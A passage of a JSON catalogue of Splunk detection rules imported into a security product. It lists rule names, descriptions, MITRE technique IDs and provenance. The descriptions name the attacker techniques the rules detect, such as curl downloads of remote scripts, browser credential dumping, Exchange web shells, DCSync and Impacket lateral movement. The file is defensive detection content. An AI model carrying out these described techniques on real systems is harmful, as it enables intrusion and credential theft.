adversaries. If confirmed malicious, this could allow attackers to understand password policies, aiding in further attacks such as password spraying or brute force attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduserresultantpasswordpolicy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b5ef342-065a-11ec-b0fc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml" } }, { "id": "splunk-security-content-8b6c15c7-5556-463d-83c7-986326c21f12", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Network Protection", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender Network Protection. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the EnableNetworkProtection registry entry. This activity is significant because disabling Network Protection can leave the system vulnerable to network-based threats by preventing Windows Defender from analyzing and blocking malicious network activity. If confirmed malicious, this action could allow attackers to bypass security measures, potentially leading to unauthorized access, data exfiltration, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-network-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b6c15c7-5556-463d-83c7-986326c21f12", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml" } }, { "id": "splunk-security-content-8b700d7e-54ad-4d7d-81cc-1456c4703306", "type": "detection", "name": "Windows Impair Defense Disable Win Defender App Guard", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender Application Guard auditing. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant because disabling auditing can hinder security monitoring and threat detection within the isolated environment, making it easier for malicious activities to go unnoticed. If confirmed malicious, this action could allow attackers to bypass Windows Defender protections, potentially leading to unauthorized access, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-app-guard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b700d7e-54ad-4d7d-81cc-1456c4703306", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml" } }, { "id": "splunk-security-content-8ba484e8-4b97-11ec-b19a-acde48001122", "type": "detection", "name": "Possible Browser Pass View Parameter", "description": "The following analytic identifies processes with command-line parameters associated with web browser credential dumping tools, specifically targeting behaviors used by Remcos RAT malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and specific file paths. This activity is significant as it indicates potential credential theft, a common tactic in broader cyber-espionage campaigns. If confirmed malicious, attackers could gain unauthorized access to sensitive web credentials, leading to further system compromise and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/possible-browser-pass-view-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ba484e8-4b97-11ec-b19a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/possible_browser_pass_view_parameter.yml" } }, { "id": "splunk-security-content-8bb3f280-dd9b-11eb-84d5-acde48001122", "type": "detection", "name": "Msmpeng Application DLL Side Loading", "description": "The following analytic detects the suspicious creation of msmpeng.exe or mpsvc.dll in non-default Windows Defender folders. It leverages the Endpoint.Filesystem datamodel to identify instances where these files are created outside their expected directories. This activity is significant because it is associated with the REvil ransomware, which uses DLL side-loading to execute malicious payloads. If confirmed malicious, this could lead to ransomware deployment, resulting in data encryption, system compromise, and potential data loss or extortion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/msmpeng-application-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8bb3f280-dd9b-11eb-84d5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/msmpeng_application_dll_side_loading.yml" } }, { "id": "splunk-security-content-8be88f46-f7e8-4ae6-b15e-cf1b13392834", "type": "detection", "name": "Linux Auditd Possible Access To Sudoers File", "description": "The following analytic detects potential access or modification of the /etc/sudoers file on a Linux system.\nIt leverages data from Linux Auditd, focusing on events of type PATH or CWD.\nThis activity could be significant because the sudoers file controls user permissions for executing commands with elevated privileges.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.\nIf confirmed malicious, an attacker could gain persistence or escalate privileges, compromising the security of the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-access-to-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8be88f46-f7e8-4ae6-b15e-cf1b13392834", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_access_to_sudoers_file.yml" } }, { "id": "splunk-security-content-8c00a385-9b86-4ac0-8932-c9ec3713b159", "type": "detection", "name": "Suspicious Rundll32 dllregisterserver", "description": "The following analytic detects the execution of rundll32.exe with the DllRegisterServer command to load a DLL. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an attempt to register a malicious DLL, which can be a method for code execution or persistence. If confirmed malicious, an attacker could gain unauthorized code execution, escalate privileges, or maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-dllregisterserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c00a385-9b86-4ac0-8932-c9ec3713b159", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_dllregisterserver.yml" } }, { "id": "splunk-security-content-8c14eeee-2af1-4a4b-bda8-228da0f4862a", "type": "detection", "name": "Detect Exchange Web Shell", "description": "The following analytic identifies the creation of suspicious .aspx files in known drop locations for Exchange exploitation, specifically targeting paths associated with HAFNIUM group and vulnerabilities like ProxyShell and ProxyNotShell. It leverages data from the Endpoint datamodel, focusing on process and filesystem events. This activity is significant as it may indicate a web shell deployment, a common method for persistent access and remote code execution. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary commands, and potentially escalate privileges within the Exchange environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-exchange-web-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c14eeee-2af1-4a4b-bda8-228da0f4862a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_exchange_web_shell.yml" } }, { "id": "splunk-security-content-8c15183e-2e70-4db4-86c3-88f8d9129b66", "type": "detection", "name": "Cisco Secure Firewall - High EVE Threat Confidence", "description": "The following analytic detects connections with a high Encrypted Visibility Engine (EVE) threat confidence score, indicating potentially malicious behavior within encrypted traffic. It leverages Cisco Secure Firewall Threat Defense logs and evaluates the EVE_ThreatConfidencePct field, which reflects the system's confidence in classifying encrypted sessions as threats based on machine learning models and behavioral analysis. A score equal to or greater than 80 suggests the connection is highly likely to be associated with malware command and control (C2), remote access tools, or suspicious tunneling behavior. If confirmed malicious, this may indicate covert communication over TLS from compromised hosts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1071.001", "T1105", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-high-eve-threat-confidence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c15183e-2e70-4db4-86c3-88f8d9129b66", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___high_eve_threat_confidence.yml" } }, { "id": "splunk-security-content-8c1de57d-abc1-4b41-a727-a7a8fc5e0857", "type": "detection", "name": "Linux Ingress Tool Transfer with Curl", "description": "The following analytic detects the use of the curl command with specific switches (-O, -sO, -ksO, --output) commonly used to download remote scripts or binaries. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it may indicate an attempt to download and execute potentially malicious files, often used in initial stages of an attack. If confirmed malicious, this could lead to unauthorized code execution, enabling attackers to compromise the system further.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ingress-tool-transfer-with-curl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c1de57d-abc1-4b41-a727-a7a8fc5e0857", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ingress_tool_transfer_with_curl.yml" } }, { "id": "splunk-security-content-8c372853-f459-4995-afdc-280c114d33ab", "type": "detection", "name": "Windows AD Domain Replication ACL Addition", "description": "The following analytic detects the addition of permissions required for a DCSync attack, specifically DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set. It leverages EventCode 5136 from the Windows Security Event Log to identify when these permissions are granted. This activity is significant because it indicates potential preparation for a DCSync attack, which can be used to replicate AD objects and exfiltrate sensitive data. If confirmed malicious, an attacker could gain extensive access to Active Directory, leading to severe data breaches and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-replication-acl-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c372853-f459-4995-afdc-280c114d33ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_replication_acl_addition.yml" } }, { "id": "splunk-security-content-8c3d1f2e-7b4a-45e3-9d8f-6a2e4c9b1234", "type": "detection", "name": "Windows PowerShell Script From WindowsApps Directory", "description": "The following analytic identifies the execution of PowerShell scripts from the WindowsApps directory, which is a common technique used in malicious MSIX package execution.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command lines and parent process paths.\nThis activity is significant as adversaries have been observed using MSIX packages with embedded PowerShell scripts (particularly StartingScriptWrapper.ps1) to execute malicious code.\nIf confirmed malicious, this could allow attackers to execute arbitrary code, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-script-from-windowsapps-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c3d1f2e-7b4a-45e3-9d8f-6a2e4c9b1234", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_script_from_windowsapps_directory.yml" } }, { "id": "splunk-security-content-8c4866e4-f488-4253-8537-7dc4f954c292", "type": "detection", "name": "HTTP Malware User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of malware. This activity can signify possible compromised hosts on the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-malware-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c4866e4-f488-4253-8537-7dc4f954c292", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_malware_user_agent.yml" } }, { "id": "splunk-security-content-8c5835b9-39d9-438b-817c-95f14c69a31e", "type": "detection", "name": "Detect HTML Help URL in Command Line", "description": "The following analytic detects the execution of hh.exe (HTML Help) loading a Compiled HTML Help (CHM) file from a remote URL. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing URLs. This activity is significant as it can indicate an attempt to execute malicious scripts via CHM files, potentially leading to unauthorized code execution. If confirmed malicious, this could allow an attacker to run scripts using engines like JScript or VBScript, leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-url-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c5835b9-39d9-438b-817c-95f14c69a31e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_html_help_url_in_command_line.yml" } }, { "id": "splunk-security-content-8c6d52ec-d5f2-4b2f-8ba1-f32c047a71fa", "type": "detection", "name": "O365 External Guest User Invited", "description": "The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities`. This detection leverages the Universal Audit Log (UAL)/o365:management:activity sourcetype as a detection data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-external-guest-user-invited.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c6d52ec-d5f2-4b2f-8ba1-f32c047a71fa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_external_guest_user_invited.yml" } }, { "id": "splunk-security-content-8c9a06bc-9939-4425-9bb9-be2371f7fb7e", "type": "detection", "name": "Windows System User Privilege Discovery", "description": "The following analytic detects the execution of `whoami.exe` with the `/priv` parameter, which displays the privileges assigned to the current user account. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an adversary attempting to enumerate user privileges, a common step in the reconnaissance phase of an attack. If confirmed malicious, this could lead to privilege escalation or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-user-privilege-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c9a06bc-9939-4425-9bb9-be2371f7fb7e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_user_privilege_discovery.yml" } }, { "id": "splunk-security-content-8ca13343-7405-4916-a2d1-ae34ce0c28ae", "type": "detection", "name": "Windows Mark Of The Web Bypass", "description": "The following analytic identifies a suspicious process that deletes the Mark-of-the-Web (MOTW) data stream. It leverages Sysmon EventCode 23 to detect when a file's Zone.Identifier stream is removed. This activity is significant because it is a common technique used by malware, such as Ave Maria RAT, to bypass security restrictions on files downloaded from the internet. If confirmed malicious, this behavior could allow an attacker to execute potentially harmful files without triggering security warnings, leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mark-of-the-web-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ca13343-7405-4916-a2d1-ae34ce0c28ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mark_of_the_web_bypass.yml" } }, { "id": "splunk-security-content-8ce07472-496f-11ec-ab3b-3e22fbd008af", "type": "detection", "name": "Impacket Lateral Movement Commandline Parameters", "description": "The following analytic identifies the use of suspicious command-line parameters associated with Impacket tools, such as `wmiexec.py`, `smbexec.py`, `dcomexec.py`, and `atexec.py`, which are used for lateral movement and remote code execution. It detects these activities by analyzing process execution logs from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns. This activity is significant because Impacket tools are commonly used by adversaries and Red Teams to move laterally within a network. If confirmed malicious, this could allow attackers to execute commands remotely, potentially leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003", "T1047", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/impacket-lateral-movement-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ce07472-496f-11ec-ab3b-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/impacket_lateral_movement_commandline_parameters.yml" } }, { "id": "splunk-security-content-8d124810-b3e4-11eb-96c7-acde48001122", "type": "detection", "name": "SLUI RunAs Elevated", "description": "The following analytic detects the execution of the Microsoft Software Licensing User Interface Tool (`slui.exe`) with elevated privileges using the `-verb runas` function. This activity is identified through logs from Endpoint Detection and Response (EDR) agents, focusing on specific registry keys and command-line parameters. This behavior is significant as it indicates a potential privilege escalation attempt, which could allow an attacker to gain elevated access and execute malicious actions with higher privileges. If confirmed malicious, this could lead to unauthorized system changes, data exfiltration, or further compromise of the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/slui-runas-elevated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d124810-b3e4-11eb-96c7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/slui_runas_elevated.yml" } }, { "id": "splunk-security-content-8d12f268-c567-4557-9813-f8389e235c06", "type": "detection", "name": "ASL AWS IAM Failure Group Deletion", "description": "The following analytic detects failed attempts to delete AWS IAM groups, triggered by access denial, conflicts, or non-existent groups. It operates by monitoring CloudTrail logs for specific error codes related to deletion failures. This behavior is significant for a SOC as it may indicate unauthorized attempts to modify access controls or disrupt operations by removing groups. Such actions could be part of a larger attack aiming to escalate privileges or impair security protocols. Identifying these attempts allows for timely investigation and mitigation, preventing potential impact on the organizations security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-failure-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d12f268-c567-4557-9813-f8389e235c06", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_failure_group_deletion.yml" } }, { "id": "splunk-security-content-8d486e2e-3235-4cfe-ac35-0d042e24ecb4", "type": "detection", "name": "O365 Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies instances where more than 10 unique user accounts fail to authenticate from a single IP address within a 5-minute window. This detection leverages O365 audit logs, specifically Azure Active Directory login failures (AzureActiveDirectoryStsLogon). Such activity is significant as it may indicate brute-force attacks or password spraying attempts. If confirmed malicious, this behavior suggests an external entity is attempting to breach security by targeting multiple accounts, potentially leading to unauthorized access. Immediate action is required to block or monitor the suspicious IP and notify affected users to enhance their security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d486e2e-3235-4cfe-ac35-0d042e24ecb4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-8d52cf03-ba25-4101-aa78-07994aed4f74", "type": "detection", "name": "Email files written outside of the Outlook directory", "description": "The following analytic detects email files (.pst or .ost) being created outside the standard Outlook directories. It leverages the Endpoint.Filesystem data model to identify file creation events and filters for email files not located in \"C:\\Users\\*\\My Documents\\Outlook Files\\*\" or \"C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook*\". This activity is significant as it may indicate data exfiltration or unauthorized access to email data. If confirmed malicious, an attacker could potentially access sensitive email content, leading to data breaches or further exploitation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/email-files-written-outside-of-the-outlook-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d52cf03-ba25-4101-aa78-07994aed4f74", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/email_files_written_outside_of_the_outlook_directory.yml" } }, { "id": "splunk-security-content-8d9e0e06-ba71-4dc5-be16-c1a46d58728c", "type": "detection", "name": "Windows Unsigned MS DLL Side-Loading", "description": "The following analytic identifies potential DLL side-loading instances involving unsigned DLLs mimicking Microsoft signatures. It detects this activity by analyzing Sysmon logs for Event Code 7, where both the `Image` and `ImageLoaded` paths do not match system directories like `system32`, `syswow64`, and `programfiles`. This behavior is significant as adversaries often exploit DLL side-loading to execute malicious code via legitimate processes. If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to privilege escalation, persistence, and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsigned-ms-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d9e0e06-ba71-4dc5-be16-c1a46d58728c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsigned_ms_dll_side_loading.yml" } }, { "id": "splunk-security-content-8db47e12-9c3e-4f5a-b0d6-e42a1895cd4f", "type": "detection", "name": "Windows PowerShell Invoke-RestMethod IP Information Collection", "description": "The following analytic detects the use of PowerShell's Invoke-RestMethod cmdlet to collect geolocation data from ipinfo.io or IP address information from api.ipify.org. This behavior leverages PowerShell Script Block Logging to identify scripts that gather external IP information and potential geolocation data. This activity is significant as it may indicate reconnaissance efforts, where threat actors are attempting to determine the geographical location or network details of a compromised system. While some legitimate software may use these services, this pattern is commonly observed in malware and post-exploitation toolkits like those used by Water Gamayun threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1016", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-invoke-restmethod-ip-information-collection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8db47e12-9c3e-4f5a-b0d6-e42a1895cd4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_invoke_restmethod_ip_information_collection.yml" } }, { "id": "splunk-security-content-8dc9efd5-805a-460e-889e-bc79e5477af9", "type": "detection", "name": "Windows SQL Server Configuration Option Hunt", "description": "This detection helps hunt for changes to SQL Server configuration options that could indicate malicious activity. It monitors for modifications to any SQL Server configuration settings, allowing analysts to 